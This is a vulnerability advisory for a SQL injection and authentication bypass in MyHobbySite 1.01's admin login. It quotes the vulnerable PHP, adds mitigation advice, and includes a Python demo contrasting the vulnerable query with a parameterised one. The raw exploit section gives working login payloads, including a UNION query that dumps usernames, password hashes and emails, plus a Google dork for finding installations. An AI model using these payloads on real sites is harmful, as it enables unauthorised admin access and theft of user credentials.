vendor: MyHobbySite
by: YuGj VN
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: MyHobbySite
Affected Version From: 1.01
Affected Version To: 1.01
Patch Exists: NO
Related CWE: N/A
CPE: a:myhobbysite:myhobbysite:1.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability

MyHobbySite 1.01 builds the Admin CP login query by interpolating the raw username and password request parameters into the SQL string, so the login form under /admin/ is open to SQL injection and, through it, authentication bypass. Entering ' or 1=1-- - as the username turns the WHERE clause into username='' or 1=1 and comments out the rest of the statement, including the password check; the first row of the users table comes back and the attacker is logged in as that account. Entering ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- - as the username (five columns, matching the users table, and mhs_ being the table prefix the advisory assumes) returns an attacker-chosen row whose username column carries the id, username, MD5 password hash and e-mail address of a stored account; the application copies that row into the session and writes the username value into the admin log via UpdateLogs(). Because -- - ends the statement, whatever is entered in the password field is ignored; the advisory repeats the payload there, which is harmless. The attack works only when magic_quotes_gpc is Off, since with it On the single quote that breaks out of the string literal is backslash-escaped.

Mitigation:

No vendor patch is listed. The fix is to stop building the query from request values: use prepared statements with bound parameters (mysqli or PDO) for the username and password comparison, and replace the unsalted MD5 check with password_hash()/password_verify(). Turning magic_quotes_gpc On is not a mitigation: it was deprecated in PHP 5.3 and removed in PHP 5.4, the ext/mysql functions used here were removed in PHP 7, and quote-escaping alone does not cover non-string injection points. Until the code is changed, restricting access to /admin/ (for example by IP address or HTTP authentication) limits exposure.
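The following is an added example, not code from MyHobbySite or from the advisory. It rebuilds the 1.01 login query against an in-memory SQLite copy of the users table, runs it with the two payloads above, and puts the same lookup done with bound parameters beside it. Assumptions: SQLite stands in for MySQL (md5() and concat_ws() are registered in Python so the query text can stay as in the PHP code), the table prefix is mhs_ as in the advisory's payload, and the two accounts are constructed sample data.

```python
"""Added example: MyHobbySite 1.01 login query, vulnerable and hardened forms,
run against an in-memory SQLite stand-in for the MySQL users table."""
import hashlib
import sqlite3

TABLE_PREFIX = "mhs_"  # assumption: the prefix the advisory's payload uses

# Constructed sample accounts, not from any real installation.
USERS = [
    (1, "admin", hashlib.md5(b"s3cret").hexdigest(), "admin@example.com", "admin"),
    (2, "bob", hashlib.md5(b"hunter2").hexdigest(), "bob@example.com", "user"),
]

# The two payloads from the advisory, verbatim.
PAYLOAD_BYPASS = "' or 1=1-- -"
PAYLOAD_DUMP = ("' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 "
                "from mhs_users-- -")


def _concat_ws(sep, *args):
    # MySQL reads 0x3a as the string ':'; SQLite reads it as the integer 58,
    # so a one-byte integer separator is mapped back to its character here.
    if isinstance(sep, int):
        sep = chr(sep)
    return str(sep).join(str(a) for a in args if a is not None)


def make_db():
    conn = sqlite3.connect(":memory:")
    # SQLite has no md5()/concat_ws(); register stand-ins so the query text
    # can mirror the PHP and the MySQL payload.
    conn.create_function("md5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.create_function("concat_ws", -1, _concat_ws)
    conn.execute(
        f"CREATE TABLE {TABLE_PREFIX}users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, email TEXT, permissions TEXT)"
    )
    conn.executemany(f"INSERT INTO {TABLE_PREFIX}users VALUES (?, ?, ?, ?, ?)", USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Mirror of the PHP: request values are spliced into the SQL text and the
    first returned row, if any, becomes the logged-in user."""
    sql = (f"SELECT * FROM {TABLE_PREFIX}users WHERE username='{username}' "
           f"AND password=md5('{password}')")
    return conn.execute(sql).fetchone()


def safe_login(conn, username, password):
    """Hardened lookup: the statement shape is fixed and both inputs are bound,
    so quotes or comment sequences in them are just data. MD5 is kept only so
    the sample schema matches; a real fix would move to a salted password hash."""
    sql = f"SELECT * FROM {TABLE_PREFIX}users WHERE username=? AND password=?"
    digest = hashlib.md5(password.encode()).hexdigest()
    return conn.execute(sql, (username, digest)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("legit   :", vulnerable_login(db, "admin", "s3cret"))
    print("bypass  :", vulnerable_login(db, PAYLOAD_BYPASS, PAYLOAD_BYPASS))
    print("dump    :", vulnerable_login(db, PAYLOAD_DUMP, PAYLOAD_DUMP))
    print("hardened:", safe_login(db, PAYLOAD_BYPASS, PAYLOAD_BYPASS))
```

With the bypass payload, vulnerable_login returns the first stored account (the admin row here) without any password; with the union payload it returns a row whose username column is id:username:hash:email for a stored user, exactly what the PHP then copies into $_SESSION and into the log. safe_login returns no row for either payload because the bound values never become part of the statement.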

Exploit-DB raw data:

#########################################################################################
# Exploit Title: MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability
# Date: 12-09-2010
# Author: YuGj VN
# Email: anhtuanittn.vn@gmail.com
# Software Link: http://www.myhobbysite.net/index.php?page=15
# Version: v1.01
#########################################################################################

Bug Code:
if (isset($_REQUEST['username']) and isset($_REQUEST['password'])) {
	// Get user info from the database
	$_REQUEST['username'] = trim($_REQUEST['username']);
	$_REQUEST['password'] = trim($_REQUEST['password']);
	// Injection point: both request values are interpolated into the query text
	// without escaping or binding, so a ' in either one ends the string literal.
	$usersettings = @mysql_query("SELECT * FROM " . $CONFIG['database_table_prefix'] . "users WHERE username='$_REQUEST[username]' AND password=md5('$_REQUEST[password]')");
	// mysql_fetch_array() returns the first matching row (or FALSE), so any
	// injected query that yields a row counts as a successful login.
	$usersettings = mysql_fetch_array($usersettings);
	if ($usersettings) {
		// Session fields are copied straight from the returned row, password hash included.
		$_SESSION['logged_in'] = TRUE;
		$_SESSION['userid'] = $usersettings['id'];
		$_SESSION['user'] = $usersettings['username'];
		$_SESSION['pass'] = $usersettings['password'];
		$_SESSION['email'] = $usersettings['email'];
		$_SESSION['permissions'] = $usersettings['permissions'];
		UpdateLogs($usersettings['username'] . " logged into the Admin CP.");
	} else {
		$failed_login = TRUE;
	}
}

#########################################################################################

Exploit:

link exploit:  http://domain.com/admin/
# Enter in username field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# Enter in password field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# or
# Enter in username field: ' or 1=1-- -
# Enter in password field: ' or 1=1-- -
# 
#
# We can exploit only when magic_quotes_gpc = Off
# Google dork: Powered by MyHobbySite 1.01
# 
#
#########################################################################################